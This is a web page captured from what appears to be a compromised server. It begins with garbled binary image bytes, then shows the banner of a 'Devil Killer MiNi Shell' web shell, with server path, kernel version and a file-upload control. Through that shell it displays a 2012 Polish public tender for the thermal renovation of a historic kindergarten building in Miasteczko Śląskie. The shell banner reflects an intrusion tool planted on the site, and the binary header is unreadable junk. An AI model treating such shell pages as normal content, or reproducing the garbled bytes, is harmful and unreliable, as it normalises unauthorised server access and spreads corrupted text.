JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120523/114361-N-2012.html

<p class="kh_header"><b>Miasteczko Śląskie: Termomodernizacja budynku Przedszkola nr 1 zlokalizowanego w Miasteczku Śląskim przy ul. Dębina 1</b><br>
<b>Numer ogłoszenia: 114361 - 2012; data zamieszczenia: 23.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasteczko Śląskie , Rynek 8, 42-610 Miasteczko Śląskie, woj. śląskie, tel. 32 393 80 01, faks 32 393 80 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasteczko-slaskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku Przedszkola nr 1 zlokalizowanego w Miasteczku Śląskim przy ul. Dębina 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane w zakresie wykonania zadania pn. Termomodernizacja budynku Przedszkola nr 1 zlokalizowanego w Miasteczku Śląskim przy ul. Dębina 1.

2. Opis przedmiotu zamówienia został opracowany na podstawie projektu termomodernizacji budynku przedszkola i kosztorysu inwestorskiego, opracowanego przez SPART S.C. Tomasz Pochylski, Bogusław Czech z siedzibą: Plac Słowiański 6/3, 41-902 Bytom.

3. Zakres planowanej inwestycji obejmuje:

1.	Roboty ziemne z rozebraniem nawierzchni z płytek chodnikowych
a)	Pomiary przy wykopach fundamentowych 90,72 m3;
b)	Rozebranie płytek chodnikowych 64,14 m2;
c)	Rozbiórka krawężników 96,0 m;
d)	Ręczne rozebranie nawierzchni betonowej nie zbrojonej gr. 12,0 cm - 67,05 m2;
e)	Wykopy przy odkrywce istniejących fundamentów w gruncie kt. III - 90,72 m3;
f)	Zasypanie wykopów z przerzutem ziemi na odległość do 3,00 m i zagęszczeniem mechanicznym gruntu warstwami - 73,99 m3;
g)	Odwóz taczkami ziemi z wykopu na odległość do 10,0 m - 90,72 m3.

2.	Remont tynków, izolacja ścian poniżej terenu
a)	Renowacja starego budownictwa. Roboty przygotowawcze. Odbicie starych tynków z zaprawy cementowo - wapiennej na ścianach, filarach, pilastrach o powierzchni do 5,0 m2 - 42,48 m2;
b)	Renowacja starego budownictwa. Roboty przygotowawcze. Oczyszczenie powierzchni ścian - 69,46 m2;
c)	Wykonanie tynków cementowych kt. III na ścianach - 42,48 m2;
d)	Ocieplenie ścian budynków materiałami systemowymi. Przyklejenie płyt styropianowych do ścian, styropian  fasada gr. 10 cm - 8,27 m2;
e)	Ocieplenie ścian budynków materiałami systemowymi. Mocowanie płyt styropianowych za pomocą dybli plastikowych do ścian - 704,0 szt.;
f)	Ocieplenie ścian budynków materiałami systemowymi. Przyklejenie warstwy siatki na ścianach - 88,27 m2;
g)	Ocieplenie ścian budynków. Ochrona narożników wypukłych kątownikiem metalowym - 7,35 m;
h)	Wykonanie izolacji pionowej powłokowej ścian - pierwsza warstwa - 88,27 m2;
i)	Wykonanie izolacji pionowej powłokowej ścian - druga warstwa - 88,27 m2;
j)	Wykonanie izolacji dwuwarstwowej z wyprawa z zaprawy cementowej z dodatkiem środka wodoszczelnego - 23,15 m2.

3.	Cokół budynku
a)	Renowacja starego budownictwa. Roboty przygotowawcze. Odbicie starych tynków z zaprawy cementowo - wapiennej na ścianach, filarach, pilastrach o powierzchni do 5,0 m2 - 24,62 m2;
b)	Renowacja starego budownictwa. Roboty przygotowawcze. Oczyszczenie powierzchni ścian - 49,24 m2;
c)	Renowacja starego budownictwa materiałami systemowymi. Ułożenie tynków renowacyjnych specjalistycznych na ścianach ręcznie do 5,0 m2 w jednym miejscu - tynk renowacyjny cokołowy gr. 20 mm - 49,24 m2;
d)	Renowacja starego budownictwa materiałami systemowymi. Ułożenie tynków renowacyjnych o grubości 5 mm na ścianach ręcznie do 5,0 m2 w jednym miejscu - tynk gr. 2 mm - 49,24 m2.

4.	Wymiana stolarki okiennej i drzwiowej
a)	Demontaż ościeżnic drewnianych okiennych i drzwiowych o powierzchni do 2,0 m2 - 48,41 m2;
b)	Demontaż ościeżnic drewnianych okiennych i drzwiowych o powierzchni do 1,5 m2 - 1,12 m2;
c)	Demontaż ościeżnic drewnianych okiennych i drzwiowych o powierzchni do 3,0 m2 - 2,46 m2;
d)	Demontaż ościeżnic drewnianych okiennych i drzwiowych o powierzchni do 5,0 m2 - 5,24 m2;
e)	Dostawa i montaż okien ościeżnicowych jedno, dwu i trójdzielnych jednokrotnie malowane farbą olejną nawierzchniową, oszklonych fabrycznie o powierzchni do 2,0 m2 - 47,92 m2;
f)	Dostawa i montaż parapetów  zewnętrznych wyk. z blachy ocynkowanej i powlekanej - 32,0 m;
g)	Dostawa i montaż parapetów wewnętrznych wyk. z PVC o dł. ponad 1 m - 32,0 m;
h)	Dostawa i montaż drzwi zewnętrznych D-1 - 4,77 m2;
i)	Dostawa i montaż drzwi zewnętrznych D-2 - 2,46 m2;
j)	Dostawa i montaż drzwi zewnętrznych D-3 - 1,12 m2;
k)	Dostawa i montaż wyłazu dachowego fabrycznie wykończonego -1 szt.

5.	Elewacja
a)	Rusztowania zewnętrzne rurowe do wysokości 10,0 m - 495,86 m2;
b)	Wykonanie daszków ochronnych wzdłuż rusztowania o kontr. rurowej - 64,14 m2;
c)	Wykonanie osłon z siatki na rusztowaniach zewnętrznych - 495,86 m2;
d)	Wykonanie instalacji odgromowej rusztowań zewnętrznych przyściennych - 495,86 m2;
e)	Renowacja starego budownictwa. Roboty przygotowawcze. Odbicie starych tynków z zaprawy cementowo - wapiennej na ścianach, filarach, pilastrach o powierzchni do 5,0 m2 skucie fragmentów dekorów poziomych i dekorów kolumn - 44,73 m2;
f)	Renowacja starego budownictwa. Roboty przygotowawcze. Odbicie starych tynków z zaprawy cementowo - wapiennej na ścianach, filarach, pilastrach o powierzchni do 5,0 m2 skucie opasek okiennych - 34,92 m2;
g)	Renowacja starego budownictwa. Roboty przygotowawcze. Odbicie starych tynków z zaprawy cementowo - wapiennej na ścianach, filarach, pilastrach o powierzchni do 5,0 m2 skucie ścian - 333,92 m2;
h)	Renowacja starego budownictwa. Roboty przygotowawcze. Oczyszczenie powierzchni ścian w miejscach łatwo dostępnych o powierzchni do 5,0 m2 - 333,92 m2;
i)	Renowacja starego budownictwa. Roboty przygotowawcze. Oczyszczenie powierzchni ścian w miejscach trudnodostępnych o powierzchni do 2,0 m2 - 89,47 m2;
j)	Naprawa pęknięć w murach z cegły budowlanej. Wykucie uszkodzonych cegieł i wstawienie nowych przy 5 cegłach w jednym miejscu - 32,0 miejsc;
k)	Czyszczenie strumieniowo - ścierne ścian prostych - 166,96 m2;
l)	Renowacja starego budownictwa materiałem systemowym. Naprawa powierzchni ściany z cegły - filary, pilastry, gzymsy, attyki - naprawa fragmentów dekorów poziomych i dekorów kolumn - 44,73 m2;
m)	Renowacja starego budownictwa materiałami systemowymi. Naprawa powierzchni ściany z cegły filary, pilastry, gzymsy, attyki  wykonanie opasek okiennych - 34,92 m2;
n)	Renowacja starego budownictwa materiałami systemowymi. Impregnacja i wzmocnienie tynków i okładzin zewnętrznych gładkich - 333,92 m2;
o)	Renowacja starego budownictwa materiałami systemowymi. Wykonanie tynku renowacyjnego ręcznie na ścianach o powierzchni ponad 5,0 m2 w jednym miejscu tynk grubości 2 mm - 333,92 m2;
p)	Renowacja starego budownictwa materiałami systemowymi. Wykonanie tynków renowacyjnych specjalistycznego ręcznie o grubości 2,0 cm na ścianach o powierzchni ponad 5,0m2 w jednym miejscu tynk ciepłochronny gr. 2,0 cm - 333,92 m2;
q)	Renowacja starego budownictwa materiałami systemowymi. Pogrubienie tynków renowacyjnych specjalistycznych ręcznie o 1,5 cm na ścianach o powierzchni ponad 5,0 m2 w jednym miejscu tynk ciepłochronny - 333,92 m2;
r)	Przyklejenie warstwy siatki z włókna szklanego na ścianach - siatka klejona materiałem systemowym grubości 3,0 mm - 333,92 m2;
s)	Renowacja starego budownictwa materiałami systemowymi. Wykonanie podkładu gruntującego na ścianach o powierzchni ponad 5,0 m2 w jednym  miejscu podkład gr. 2 mm - 458,31 m2;
t)	Renowacja starego budownictwa materiałami systemowymi. Wykonanie tynków renowacyjnych ręcznie na ścianach o powierzchni ponad 5,0 m2 w jednym miejscu - warstwa wykończeniowa z tynku gr. 2,0 mm - 458,31 m2;
u)	Bonie prostokątne na ścianach, słupach i pilastrach wykonane ręcznie na tynku szlachetnym - 749,13 m2
v)	Malowanie dwukrotne farbą - materiałem systemowym tynków gładkich zewnętrznych - 490,47 m2.

6.	Opaska żwirowa
a)	Nawierzchnie żwirowe. Chodniki rozścielane ręcznie. Grubość warstwy po zagęszczeniu 5 cm - 44,5 m2.

7.	Remont i docieplenie dachu
a)	Rozebranie obróbek blacharskich murów ogniowych, okapów, kołnierzy gzymsów itp. z blachy nie nadającej się do użytku - 15,46 m2;
b)	Rozebranie rynien z blachy nie nadającej się do użytku - 74,61 m2;
c)	Rozebranie rur spustowych z blachy nie nadającej się do użytku - 32,08 m;
d)	Rozbiórka pokrycia z papy na dachach drewnianych, pierwsza warstwa - 362,30 m2;
e)	Rozbiórka pokrycia z papy na dachach drewnianych, następna warstwa - 362,30 m2;
f)	Rozebranie konstrukcji więźby dachowej. Rozebranie deskowania dachu z desek - 362,30 m2;
g)	Rozebranie podsypki izolacyjnej z tłucznia ceglanego, kruszywa keramzytowego albo gruzu z betonu komórkowego - 243,20 m2;
h)	Przemurowanie kominów z cegły klinkierowej o objętości w jednym miejscu ponad 0,5 m3. Użycie zaprawy z wapna sucho gaszonego - 1,16 m3;
i)	Wykonanie tynków kt. III cem.-wap. wykonanych ręcznie na ścianach płaskich wyk. z cegły, pustaków ceramicznych, gazo i pianobetonach, pow. podłogi pomieszczeń ponad 5 m2 - 8,86 m2;
j)	Odgrzybianie elementów drewnianych o powierzchni do 2 m2 przy użyciu szczotek stalowych - 129,45 m2;
k)	Odcięcie zagrzybiałych części elementów drewnianych o powierzchni przekroju do 100 cm2 miejsca cięcia trudno dostępne - 89,00 szt.;
l)	Wymiana elementów konstrukcyjnych dachu. Krokwie zwykłe i kleszcze - 242,42 m;
m)	Wzmocnienie krokwi deskami o gr. 32 mm. Dwustronne nabicie desek na krokwie 36,50 m;
n)	Wzmocnienie legarów łatami o wymiarach 6x4 cm (przyjęto 50% pow. stropu) - 121,60 m2;
o)	Wykonanie izolacji cieplnej i przeciwdźwiękowej poziomej z wełny mineralnej z płyt układanych na sucho. Jedna warstwa - płyty z wełny mineralnej gr. 15 cm - 243,20 m2;
p)	Izolacja z folii paraizolacyjnej przymocowanej do konstrukcji drewnianej - 243,20 m2;
q)	Wykonanie poszycia stropu z płyt OSB gr. 22 mm - 285,66 m2;
r)	Wykonanie deskowania dachu na styk. Deski o grubości 25 mm - 363,80 m2;
s)	Wykonanie deskowania dachu na styk. Deski grubości 25 mm (podbitka dachu) - 60,13 m2;
t)	Wykonanie impregnacji ogniochronnej i grzybobójczej - 544,12 m2;
u)	Pokrycie dachów jedna warstwa papy termozgrzewalnej z zagruntowaniem podłoża emulsją asfaltową i ułożeniem na sucho papy perforowanej - papa w klasie NRO - 339,00 m2;
v)	Ułożenie drugiej warstwy papy termozgrzewalnej z zagruntowaniem podłoża emulsją asfaltową i ułożenie na sucho papy perforowanej - papa w klasie NRO - 339,00 m2;
w)	Wykonanie konstrukcji dachowej z krawędziaków iglastych nasyconych. Krokwie zwykłe (nakłady robocizny i sprzętu na 1 m elementu konstrukcji) - 77,00 m;
x)	Wykonanie konstrukcji dachowej z krawędziaków iglastych nasyconych. Krokwie zwykłe (nakłady na 1 m3 drewna konstrukcyjnego) - wiązary z pasów i słupków o wym. 7x14 cm - 0,75 m3;
y)	Krycie dachów blachą z cynku o grubości 0,50 mm, rozstaw rąbka prostopadłego do okapu 57 cm - 24,80 m2;
z)	Dostawa i montaż rynien dachowych z PVC półokrągłych o średnicy 150 mm łączone na uszczelki - 74,61 m;
aa)	Dostawa i montaż leji spustowych do rynien dachowych z PVC łączonych na uszczelki - 4 szt.;
bb)	Dostawa i montaż rur spustowych okrągłych o średnicy 110 mm z PVC - 321,08 m.

8.	Instalacja odgromowa
a)	Wymiana przewodów instalacji odgromowej naprężanej poziomej na uprzednio zainstalowanych wspornikach na dachach płaskich - 83,46 m;
b)	Wymiana wsporników instalacji odgromowej na dachach płaskich pokrytych papą - uchwyty betonowe w tworzywie - 150,00 szt.;
c)	Wymiana wsporników instalacji odgromowej na dachach płaskich pokrytych papą na drewnie - 75,00 szt.;
d)	Wymiana przewodów instalacji uzupełniającej i odgromowej na ścianach na uprzednio zamontowanych wspornikach. Pręt o przekroju do 120 mm2, ciąg pionowy - 35,4 m;
e)	Wymiana rur grubościennych  o średnicy do 28 mm w bruzdach na podłożu betonowym, bez wykucia i zaprawiania bruzd - 12,00 m;
f)	Mechaniczne wykonanie ślepych otworów o głębokości do 8 cm i średnicy do 10 mm w cegle - 72,00 szt.;
g)	Osadzenie w podłożu kołków metalowych kotwiących M10 w gotowych otworach. Montaż na ścianie - 72,00 szt.;
h)	Przygotowanie podłoża betonowego pod osprzęt instalacyjny. Mocowanie osprzętu przez przykręcenie do kołków plastikowych - 72,00 szt.;
i)	Montaż na gotowym podłożu puszek 140x180 z tworzywa sztucznego przykręcanych - puszki na złącza kontrolne instalacji odgromowej - 9,00 szt.;
j)	Wymiana złączy instalacji odgromowych uniwersalnych lub krzyżowych - 42,00 szt.;
k)	Wymiana złączy instalacji odgromowych na dachu - 70,00 szt.;
l)	Wymiana złączy instalacji odgromowych kontrolnych połączonych pręt - płaskownik -18,00 szt.;
m)	Wymiana złączy instalacji odgromowych naprężających na ścianie - 72,00 szt.;
n)	Badanie instalacji odgromowej - pomiar pierwszy -1 pomiar;
o)	Badanie instalacji odgromowej - pomiar następny - 17 pomiar.

9.	Naprawa murków oporowych i nawierzchni przy wejściu
a)	Renowacja starego budownictwa. Roboty przygotowawcze. Odbicie tynków cementowo - wapiennych na ścianach, filarach, pilastrach o pow. do 5 m2 - 6,28 m2;
b)	Uzupełnienie tynków zewnętrznych cementowych kat III ścian, loggii, balkonów podłoże z cegły, pustaków ceramicznych, gazo i pianobetonów w jednym miejscu do 2 m2 - 6,28 m2;
c)	Renowacja starego budownictwa materiałami systemowymi. Ułożenie tynków renowacyjnych ręcznie. Wykonanie podkładu gruntującego, na ścianach o powierzchni ponad 5 m2 w jednym miejscu, podkład gr. 2 mm - 6,28 m2;
d)	Renowacja starego budownictwa materiałami systemowymi. Wykonanie tynków renowacyjnych ręcznie na ścianach o powierzchni ponad 5,0 m2 w jednym miejscu - warstwa wykończeniowa gr. 2,0 mm - 6,28 m2;
e)	Nakrywy attyk ścian ogniowych i kominów o średniej grubości płyty 7 cm - 1,12 m2;
f)	Nawierzchnie z kostki brukowej betonowej szarej o grubości 6 cm układanej na podsypce piaskowej - 2,21 m2;
g)	Ścieki z elementów betonowych na podsypce cementowo - piaskowej. Grubość prefabrykatów 15 cm - 1,60 m.

10.	Wywóz ziemi i gruzu
a)	Wywóz i utylizacja samochodami samowyładowczymi ziemi i gruzu na odległość do 1 km. Kategoria gruntu IV - 23,75 m3;
b)	Wywóz ziemi i gruzu samochodami samowyładowczymi dodatek za każdy 1 km - 23,75 m3;
c)	Wywiezienie i utylizacja gruzu pryzmowanego samochodami skrzyniowymi na odległość do 1 km - 33,50 m3;
d)	Wywiezienie i utylizacja gruzu pryzmowanego samochodami skrzyniowymi dodatek za każdy następny 1km - 33,50 m3;
e)	Wywiezienie i utylizacja zdemontowanej papy i zasypki dachowej samochodami skrzyniowymi na odległość do 1 km - 26,65 m3;
f)	Wywiezienie i utylizacja zdemontowanej papy i zasypki dachowej samochodami skrzyniowymi dodatek za każdy następny 1 km - 26,65 m3.

11.     Roboty towarzyszące:
1.	Opracowanie planu BIOZ.
2.	Sporządzenie harmonogramu rzeczowo finansowego w rozbiciu na poszczególne etapy robót.
3.	Realizacja inwestycji przez osoby z odpowiednimi uprawnieniami branżowymi.
4.	Zabezpieczenie terenu budowy.
5.	Organizacja placu budowy, wykonanie zaplecza, montaż podstacji elektrycznej.
6.	Po zakończeniu robót uporządkowanie terenu budowy i zaplecza.
7.	Wykonanie robót wynikających z technologii producenta stosowanych materiałów, aktualnej wiedzy i sztuki budowlanej.
8.	Wykonanie dokumentacji powykonawczej konstrukcji drewnianej dachu.

4. Obiekt, który jest przedmiotem ww. inwestycji jest budynkiem, który powstał około roku 1890, dawniej nazywany willą Rubina. Figuruje on w wykazie zabytków nieruchomych wyznaczonych przez Śląskiego Wojewódzkiego Konserwatora Zabytków do ujęcia w wojewódzkiej ewidencji zabytków. Realizując przedmiotową inwestycję, Gmina musi spełnić określone warunki przy planowaniu i realizacji przedsięwzięcia, które są wytycznymi określonymi przez Śląskiego Wojewódzkiego Konserwatora Zabytków i są zgodne z Ustawą o ochronie zabytków i opiece nad zabytkami z dnia 23 lipca 2003 r. (Dz.U. Nr 162, poz. 1568 z późn. zm.).

5. Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji technicznej, która jest integralną częścią niniejszej specyfikacji.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.26.14.10-1, 45.42.11.32-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 14.000,00 zł (słownie: czternaście tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem zawodowym polegającym na tym, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty budowlane polegające na termomodernizacji budynku na kwotę minimum 400.000,00 zł (brutto) każda.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje osobą lub osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi aktualne uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej (minimum 1 osoba).
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę ubezpieczenia nie mniejszą niż 500.000,00 zł.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

